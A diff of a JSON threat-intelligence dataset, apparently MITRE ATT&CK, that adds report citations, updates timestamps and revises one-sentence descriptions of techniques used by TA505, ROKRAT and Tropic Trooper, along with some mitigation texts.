"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--e3f7935d-0f3a-440a-be19-ef9383914441",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.257Z",
+ "modified": "2020-05-29T20:09:49.188Z",
"created": "2019-05-28T16:36:50.742Z"
},
{
@@ -133718,13 +134974,23 @@
"description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times",
"source_name": "Proofpoint TA505 June 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--5aaee352-e4b5-4d4c-b021-9f38adb346da",
"type": "relationship",
- "modified": "2020-03-19T17:35:11.707Z",
+ "modified": "2020-06-01T15:46:47.950Z",
"created": "2019-05-28T16:53:41.745Z"
},
{
@@ -133837,13 +135103,28 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--49d6508c-f350-4376-ba32-f64693d7fd10",
"type": "relationship",
- "modified": "2020-03-17T15:01:32.719Z",
+ "modified": "2020-06-01T15:46:48.052Z",
"created": "2019-05-28T18:49:59.356Z"
},
{
@@ -133858,13 +135139,18 @@
"description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter",
"source_name": "Proofpoint TA505 Sep 2017"
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Sep 2017)",
+ "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--239a4ed5-afe6-4d1d-8dfe-ee4df7bc01ba",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.452Z",
+ "modified": "2020-06-01T14:53:46.623Z",
"created": "2019-05-28T18:49:59.414Z"
},
{
@@ -133879,13 +135165,23 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--1b215137-e9e7-4022-af63-8d932c384eb2",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.542Z",
+ "modified": "2020-05-29T20:09:49.523Z",
"created": "2019-05-28T19:08:05.735Z"
},
{
@@ -134094,13 +135390,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used msiexec to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--2f350d97-8492-4eb4-8640-2c3ae2bc8df1",
"type": "relationship",
- "modified": "2020-03-17T14:38:57.120Z",
+ "modified": "2020-05-29T19:02:07.218Z",
"created": "2019-05-29T12:47:44.943Z"
},
{
@@ -134146,13 +135447,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--badc4d79-2f59-4b9b-9044-9c53dcd386c0",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.399Z",
+ "modified": "2020-06-16T16:57:13.452Z",
"created": "2019-05-29T13:02:31.667Z"
},
{
@@ -134177,13 +135483,18 @@
"description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.",
"url": "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
"source_name": "Deep Instinct TA505 Apr 2019"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)",
+ "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)",
"relationship_type": "uses",
"id": "relationship--7575fb4d-0fa3-4a16-acb6-734841da41bc",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.544Z",
+ "modified": "2020-05-29T19:02:07.489Z",
"created": "2019-05-29T13:40:48.666Z"
},
{
@@ -134486,13 +135797,23 @@
"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Jan 2019)",
+ "description": "(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--60026624-0ae9-439a-8ee8-faee7ce6ddf0",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.540Z",
+ "modified": "2020-05-29T20:09:49.511Z",
"created": "2019-05-29T14:33:43.929Z"
},
{
@@ -134606,13 +135927,18 @@
"description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times",
"source_name": "Proofpoint TA505 June 2018"
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)",
+ "description": "(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--1e7f0283-1aeb-4b9e-81e0-4aec48e30228",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.546Z",
+ "modified": "2020-06-01T14:53:46.663Z",
"created": "2019-05-30T19:49:35.757Z"
},
{
@@ -134813,16 +136139,21 @@
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"external_references": [
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)\t",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"relationship_type": "uses",
"id": "relationship--90be71e4-6b38-4411-aac5-09711a334393",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.585Z",
+ "modified": "2020-05-21T17:07:02.808Z",
"created": "2019-06-04T14:17:34.176Z"
},
{
@@ -136683,7 +138014,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Bromium Ursnif Mar 2017",
@@ -136695,7 +138026,7 @@
"relationship_type": "uses",
"id": "relationship--b5ebcf96-92f6-46d3-a9a1-1773e4f3ec02",
"type": "relationship",
- "modified": "2020-03-19T17:40:56.458Z",
+ "modified": "2020-06-24T13:57:17.221Z",
"created": "2019-06-10T17:44:49.367Z"
},
{
@@ -136838,7 +138169,7 @@
"id": "relationship--9ffc8525-79a5-40a2-b371-46052daf66c5",
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.533Z",
+ "modified": "2020-05-04T18:36:39.435Z",
"created": "2019-06-13T16:04:04.082Z"
},
{
@@ -136852,7 +138183,7 @@
"id": "relationship--21ea4371-e692-4731-9f8c-c3f4dff3c775",
"description": "Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.583Z",
+ "modified": "2020-05-04T18:36:39.488Z",
"created": "2019-06-13T16:04:04.168Z"
},
{
@@ -136866,7 +138197,7 @@
"id": "relationship--74e433ec-0c52-42f2-b0d4-3e1f3a56b419",
"description": "Use multi-factor authentication for user and privileged accounts.",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.559Z",
+ "modified": "2020-05-04T18:36:39.522Z",
"created": "2019-06-13T16:04:04.180Z"
},
{
@@ -136983,7 +138314,7 @@
"description": "Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means.",
"id": "relationship--4df90c69-8ac5-4f22-b0cf-dd4debb8e051",
"type": "relationship",
- "modified": "2019-07-16T19:44:08.123Z",
+ "modified": "2020-03-31T22:18:43.144Z",
"created": "2019-06-13T16:43:14.999Z"
},
{
@@ -136997,7 +138328,7 @@
"description": "Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Strong passwords should be used on certain encrypted documents that use them to prevent offline cracking through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.",
"id": "relationship--967c7069-6bb3-4f10-ba6b-5befdabe6c97",
"type": "relationship",
- "modified": "2019-07-16T19:44:08.132Z",
+ "modified": "2020-03-31T22:18:43.158Z",
"created": "2019-06-13T16:43:15.017Z"
},
{
@@ -137018,7 +138349,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:28:10.323Z",
+ "modified": "2020-05-20T18:23:36.110Z",
"created": "2019-06-13T16:47:55.972Z"
},
{
@@ -137066,13 +138397,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-20T19:53:25.785Z",
+ "modified": "2020-04-23T19:10:28.421Z",
"created": "2019-06-13T16:49:49.549Z"
},
{
@@ -137111,7 +138442,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
"relationship_type": "mitigates",
- "description": "Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)",
+ "description": "Set a browser extension allow or deny list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)",
"id": "relationship--e13f1e41-fc5c-4cd3-ad6b-62bc597c959a",
"external_references": [
{
@@ -137121,7 +138452,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:36:30.822Z",
+ "modified": "2020-06-20T20:11:42.310Z",
"created": "2019-06-13T16:53:10.350Z"
},
{
@@ -137303,7 +138634,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-14T18:19:15.031Z",
+ "modified": "2020-07-06T17:54:28.228Z",
"created": "2019-06-13T18:58:06.815Z"
},
{
@@ -137324,7 +138655,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-16T20:53:20.713Z",
+ "modified": "2020-07-14T19:44:50.992Z",
"created": "2019-06-13T18:59:41.067Z"
},
{
@@ -137958,7 +139289,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.431Z",
+ "modified": "2020-06-09T20:44:40.825Z",
"created": "2019-06-14T17:21:38.567Z"
},
{
@@ -137972,7 +139303,7 @@
"description": "Ensure that local administrator accounts have complex, unique passwords across all systems on the network.",
"id": "relationship--7a3426bf-1751-43db-b844-6bf388a4c817",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.406Z",
+ "modified": "2020-06-09T20:44:40.822Z",
"created": "2019-06-14T17:21:38.582Z"
},
{
@@ -137998,7 +139329,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.433Z",
+ "modified": "2020-06-09T20:44:40.851Z",
"created": "2019-06-14T17:21:38.632Z"
},
{
@@ -138136,16 +139467,21 @@
"target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"external_references": [
{
- "description": "Hulcoop, A., et al. (2016, November 17). It\u2019s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.",
+ "source_name": "CitizenLab KeyBoy Nov 2016",
"url": "https://citizenlab.ca/2016/11/parliament-keyboy/",
- "source_name": "CitizenLab KeyBoy Nov 2016"
+ "description": "Hulcoop, A., et al. (2016, November 17). It\u2019s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019."
+ },
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of Windows Address Book executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: Anomali Pirate Panda April 2020)",
"relationship_type": "uses",
"id": "relationship--77dbc1ae-556e-43cd-b776-c7670ab5c915",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.310Z",
+ "modified": "2020-05-21T12:59:00.606Z",
"created": "2019-06-17T18:43:35.376Z"
},
{
@@ -138160,13 +139496,18 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
"url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
"source_name": "TrendMicro TropicTrooper 2015"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used pr to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used pr and an openly available tool to scan for open ports on target systems.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)",
"relationship_type": "uses",
"id": "relationship--5929ef3e-3945-4ede-b3cd-94f47850a6bd",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.307Z",
+ "modified": "2020-05-21T14:55:00.488Z",
"created": "2019-06-17T18:43:35.392Z"
},
{
@@ -138190,27 +139531,6 @@
"modified": "2019-06-30T22:44:28.340Z",
"created": "2019-06-17T18:43:35.447Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "external_references": [
- {
- "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
- "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
- "source_name": "TrendMicro TropicTrooper 2015"
- }
- ],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system\u2019s OS version.(Citation: TrendMicro TropicTrooper 2015)",
- "relationship_type": "uses",
- "id": "relationship--eba2ecc5-b383-4cbb-93f9-9cef81cd016b",
- "type": "relationship",
- "modified": "2019-06-30T22:44:28.338Z",
- "created": "2019-06-17T18:43:35.470Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -138267,7 +139587,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--93b3993d-0345-434e-9b0a-4dfd8efa6c99",
"type": "relationship",
@@ -138288,7 +139608,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--74e1dbd9-baad-488f-9b30-4430420e15d3",
"type": "relationship",
@@ -138309,7 +139629,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) checks for the system\u2019s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system\u2019s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--01c60a20-2eff-4b4e-a15a-24e56a487b4e",
"type": "relationship",
@@ -138330,7 +139650,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--618d4835-6022-46df-bee1-38fcb97ffb91",
"type": "relationship",
@@ -138351,7 +139671,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
